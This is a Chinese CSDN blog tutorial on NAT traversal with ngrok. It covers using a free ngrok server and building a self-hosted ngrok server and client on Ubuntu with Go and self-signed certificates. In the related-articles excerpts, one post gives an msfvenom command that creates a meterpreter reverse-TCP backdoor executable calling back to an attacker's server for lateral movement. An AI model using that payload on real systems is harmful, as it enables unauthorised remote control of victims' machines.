内网穿透、反向代理(ngrok服务器搭建)

最新推荐文章于 2024-04-02 18:27:21 发布
最新推荐文章于 2024-04-02 18:27:21 发布
阅读量1.8w 收藏 24
点赞数 3
分类专栏: 其他 文章标签: ubuntu ngrok 内网穿透 反向代理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiahailong90/article/details/79107453
版权

内网穿透的目的是:让外网能访问你本地的应用,例如在外网打开你本地http://127.0.0.1指向的Web站点。

一、ngrok

ngrok是一个反向代理,通过在公共的端点和本地运行的Web服务器之间建立一个安全的通道。ngrok可捕获和分析所有通道上的流量,便于后期分析与响应。

开源免费

官网:https://ngrok.com/

源码:https://github.com/inconshreveable/ngrok

ngrok1.x开源,ngrok2.x不开源

ngrok使用go语言开发,源代码分为客户端服务器端

国内免费服务器:http://ngrok.ciqiuwl.cn/


下面以上面的免费服务器为示例完成内网穿透

现在假定我的本地已成功部署了一个网站,访问地址为127.0.0.1,想内网穿透后被公网上的用户访问,一般步骤如下:

步骤1、下载windows版本的客户端,解压。一般在为你提供代理服务器的网站上找你要下载的客户端:

步骤2、在命令(cmd)行下进入到ngrok客户端目录下

步骤3、执行 ngrok -config=ngrok.cfg -subdomain xxx 80 //(xxx 是你自定义的域名前缀),建议批处理

如果连接成功,会提示如下信息:

这一步如果你认为太麻烦,可以直接运行目录下的start.bat批处理文件就不用进DOS环境了。运行start.bat直接跳过2,3步

步骤4、如果开启成功 你就可以使用 xxx.ngrok.xiaomiqiu.cn 来访问你本机的 127.0.0.1:80 的服务了,当然你必须确定的是你本机的Web是可以正常访问的。

注意:

如果你自己有顶级域名,想通过自己的域名来访问本机的项目,那么先将自己的顶级域名解析到120.25.161.137(域名需要已备案哦,80端口必须备案),然后执行 ngrok -config=ngrok.cfg -hostname xxx.xxx.xxx 80 //(xxx.xxx.xxx是你自定义的顶级域名)


二、ubuntu下生成ngrok服务器与客户端应用程序

使用Putty远程登陆到服务器,如下所示:

1、安装GIT、获取ngrok:

mkdir ngrok #创建名称为ngrok的目录

apt-get update #更新包管理器

apt-get install git  #安装git

git clone https://github.com/inconshreveable/ngrok.git ngrok2 #将ngrok源代码克隆回本地

成功执行后如下所示:

PS. 直接在服务器上下载的话实在太慢,可以先在本地下载好,然后用ftp放到服务器上去直接用

2、安装Go语言:

apt-get install golang #安装go语言

执行结果如下:

3、设置环境变量

export GOPATH=/usr/local/ngrok/  #设置环境变量,Go语言的安装位置
export NGROK_DOMAIN="xxxx.cn"  #设置环境变量,xxx.cn为你的域名


4、切换到ngrok目录下执行以下命令为域名生成证书

cd ngrok
openssl genrsa -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -subj "/CN=$NGROK_DOMAIN" -days 5000 -out rootCA.pem
openssl genrsa -out server.key 2048
openssl req -new -key server.key -subj "/CN=$NGROK_DOMAIN" -out server.csr
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 5000

生成后的结果如下:

证书如下:


5、拷贝证书到指定位置

cp rootCA.pem assets/client/tls/ngrokroot.crt  #复制rootCA.pem到assets/client/tls/并更名为ngrokroot.crt
cp server.crt assets/server/tls/snakeoil.crt #复制server.crt到assets/server/tls/并更名为snakeoil.crt
cp server.key assets/server/tls/snakeoil.key #复制server.key到assets/server/tls/并更名为snakeoil.key

6、 编译

 由于go语言的特性,在编译时直接生成机器码,所以在运行过程中并不需要go的环境(非托管应用)。在ngrok目录下,运行一下命令分别生成对应的客户端与服务端。

#win服务端
GOOS=windows GOARCH=386 make release-server 
#win客户端
GOOS=windows GOARCH=386 make release-client
#linux服务端
GOOS=linux GOARCH=386 make release-server
#linux客户端
GOOS=linux GOARCH=386 make release-client

生成完成后,在工作目录的bin文件夹下,产生对应的文件。以编译windows平台为例,会产生“ngrok.exe”与“ngrokd.exe”这两个文件,前者客户端,后者需要运行在公网服务器上。

因为项目中引用了一些外部资源,生成会耗费一些时间,对网络也有一定的要求,太慢会中短,命令执行下如:

生成结果:

这里我还生成了两个运行在windows服务器与客户端的应用:

ngrok 是客户端,ngrokd 是服务端。

7、启动ngrok服务端

切换到ngrokd 服务端程序所在的目录并执行如下命令:

./ngrokd -domain xxxx.cn

xxx.cn代表你的域名

执行效果如下:



8、配置客户端

拷贝生成的ngrok.exe到本地计算机,并新建配置文件ngrok.cfg,内容为:

server_addr: "xxxx.cn:4443"
trust_host_root_certs: false

xxx.cn代表你的域名

再新建文件start.bat批处理文件,内容为:

ngrok.exe -subdomain hello -config=ngrok.cfg 8080
hello为子域名前缀,访问时格式为hello.xxx.cn

8080为本地tomcat服务器使用的端口号。

双击start.bat启动效果如下所示:


到此,就可以通过域名hello.xxx.cn访问本地的服务器了。例如我的tomcat服务器:


在编译生成的时候执行 
GOOS=windows GOARCH=386 make release-server
生成服务器端一切正常,可是生成客户端的时候一直报错,说找不到 sync.Pool。后来发现是GO语言软件版本太低了,使用1.3以上版本就不会有问题。
漠落
关注
  • 3
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
最全ngrok实现内网穿透详细教程(windows linux)
qq_42978230的博客
02-03 2万+
内网穿透 什么是内网穿透 内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。 UDP 内网穿透的实质是利用路由器上的NAT 系统。NAT 是一种将私有(保留)地址转化为合法IP地址的转换技术,它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中。NAT可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽。 应用场景:上面
内网穿透Windows 64位Ngrok
10-28
保姆级教程-手把手教你如何快速实现内网穿透,外网也能轻松访问自已的内网Web服务器
内网穿透工具Ngrok
12-27
钉钉内网穿透工具,支持http,https协议,同时支持更丰富的系统和语言:linux、win、mac、openwrt、 python、php等
用@.xxx.cn可实现短域名xxx.cn跳转
weixin_34410662的博客
03-24 1390
没有固定ip的顶级域名这样设置url转向 xxx.cn的url转向设置方法: 设置栏中加@符即可 @.xxx.cn---对应---跳转网址。 当然解析CNAME也是一样的。 这样的话xxx.cn即可转到你的跳转网址。 转载于:https://www.cnblogs.com/luckr/archive/2008/03/24/1119559.html...
frp内网穿透之(反向代理nginx)
最新发布
weixin_39255905的博客
04-02 1014
​ 如果没有报错,代表启动成功!云服务器,配置规则记得也要开放。​ 其中 frps.toml 文件就是我们服务端的配置文件,我们需要根据自己情况稍作修改。可以手动下载到本地,然后通过scp命令传到服务器,也可以直接在外网服务器上下载。如果你使用的是windows系统,配置和启动方法一样。​ 其中作为服务端,我们只需要关注 frps 和 frps.toml 文件。​ 此时frp的服务端我们就配置完毕了,接下来开始配置客户端。​ 注意:配置项并未介绍完,详情请参见官方文档。​ 如控制台未报错,代表启动成功,
一文拿捏内网穿透利器之frp(反向代理软件相关)
ITSM/ITIL/网络安全/IT运维
10-26 2474
简单地说,frp就是一个反向代理软件, 它的作用是将内网中的服务器暴露到互联网上, 它体积轻量但功能很强大!!!通过它我们可以很方便实现内网穿透功能!!!它其实有两个服务:客户端frpc, 安装在我们内网中某台物理机上服务端frps, 安装在一个公网服务器上如下图:首先公网上先部署了frps服务, 并设置了连接端口然后在内网中运行frpc服务, 启动时会连接到公网上的frpc服务, 并保持保持住这个长连接(如果断开了会进行重试)
ssh反向代理实现内网穿透;ssh+nginx实现公网云服务器代理访问内网服务器
雪的期许
04-23 7750
文章目录情景描述准备工作1. 服务器示例2. ssh工具3. autossh工具(重要)4. ssh免密登录5. 开机自启动一、基于ssh+nginx实现外网访问内网的web网站1. 内网服务器:建立反向代理2. 公网服务器3. 公网服务器:配置nginx4. 浏览器访问网站即可二、基于ssh实现远程访问内网服务器1. 内网服务器:建立反向代理2. 公网服务器3. 公网服务器:正向代理4. 个人电脑使用ssh远程登录内网服务参考资料 情景描述 之前在校园网内的服务器上部署了web项目,由于外网无法访问到该网
使用FRP(快速反向代理)实现内网穿透——以腾讯云服务器为例
qq_44667259的博客
04-14 6797
FRP(fast reverse proxy,快速反向代理技术),通过frp的部署,可以实现从互联网访问局域网内的某主机,实现“内网穿透”。
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 720
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
wwwxxx域名选择(www.xxx.com或者.cn)
热门推荐
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-26 48万+
域名就是网站的网址,就跟家庭住址一样,那么域名就是我们网站的地址,我们使用方便记忆的域名(字母/数字+.COM等域名后缀:www.xxx.com)。 按所属机构分常见后缀形式: COM:商业性的机构/公司/个人,因为COM这个后缀公信度高,所以用得比较多 ORG :非盈利的组织、团体 GOV:政府部门 NET:从事Internet相关的的机构或公司 EDU:教育机构 .互联网通用顶级域之一,主要供教育机构,如大学等院校使用,实际使用的教育机构大部分位于美国。 注意:还有很多,但是不常见,就先不
nginx配置多个二级子域名
月迷津渡丶的专栏
08-22 4万+
 配置/etc/nginx/nginx.conf(例子是https) user nginx; worker_processes auto; error_log /var/log/nginx/error.log; pid /run/nginx.pid; include /usr/share/nginx/modules/*.conf; events { worker_connectio...
ngrok服务器搭建流程.zip
08-15
ngrok服务器搭建流程,实现内网透传,方便微信开发,流程验证可用
自己服务器内网穿透搭建技术
07-28
在自己的服务器上搭建内网穿透,让外网的人看到自己电脑上的网站
内网穿透工具ngrok.rar
12-12
ngrok工具,临时用来开个测试网站远程什么的,备用
初级内网穿透工具Ngrok
09-23
初级程序员
FRP:配置反向代理内网穿透
we chat:玩转测试开发
03-12 2308
frp 是一个快速反向代理,帮助您将NAT或防火墙后面的本地服务器暴露到internet 的 开源、简洁易用、高性能的内网穿透反向代理软件,支持 tcp, udp, http, https等协议,github Star 高达65.1k。3.2、家庭网络访问公司服务器:xshell等ssh连上外网ip所在的服务器,ssh端口1234。5、多个原生支持的客户端插件(静态文件查看,HTTP、SOCK5 代理等),1、配置服务端:外网ip所在的服务器,假设为:111.112.113.114。
使用云服务器和Frp(快速反向代理)框架快速部署实现内网穿透
m0_46339652的博客
07-29 2224
Frp(Fast Reverse Proxy)是一个快速的反向代理工具,它是一款基于Golang语言开发的开源项目,用于将局域网中的内部服务暴露给公网,实现内网穿透的功能。主要特点和用途:1.内网穿透:Frp允许你在内网主机上运行frpc客户端,通过连接到公网上运行的frps服务器,将内网主机的服务暴露到公网上,实现内网穿透,让外部用户可以访问内网的服务。2.简单易用:配置简单,可以通过编辑ini配置文件来指定要暴露的内网服务和端口号等信息。
搭建自己的代理服务器
chen7528592的博客
04-09 8011
搭建自己的代理服务器
tcp内网穿透filezilla ftp服务器搭建
07-27
要实现TCP内网穿透并搭建FileZilla FTP服务器,你可以按照以下步骤操作: 1. 在你的局域网中,将FTP服务器安装在你的计算机上。你可以从FileZilla官方网站(https://filezilla-project.org/)下载并安装FileZilla服务器软件。 2. 配置FileZilla服务器。运行FileZilla服务器软件,按照提示进行配置。设置FTP服务器的监听端口、FTP用户和密码等信息。 3. 确保你的防火墙和路由器允许外部访问FTP服务器。在你的路由器上,将FTP服务器所在的计算机设置为DMZ主机,或者在路由器上设置端口转发规则,将FTP服务器所使用的端口映射到该计算机。 4. 获取公网IP地址。你可以通过访问网站(例如https://www.whatismyip.com/)来获取你的公网IP地址。 5. 配置TCP内网穿透工具。TCP内网穿透工具可以帮助你将公网IP地址和FTP服务器所使用的端口映射到你的局域网中。常用的工具有ngrok、frp等。你可以选择一个合适的工具,并按照其文档说明进行配置。 6. 启动TCP内网穿透工具,并将公网IP地址和FTP服务器所使用的端口配置到工具中。 7. 现在,你应该能够通过公网IP地址和FTP服务器所使用的端口访问你的FTP服务器了。使用FTP客户端,输入公网IP地址、端口、用户名和密码,即可连接到FTP服务器并进行文件传输。 请注意,TCP内网穿透涉及到网络安全和网络设置等方面的知识,确保你的网络环境安全,并详细了解你所使用的工具的配置和安全性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值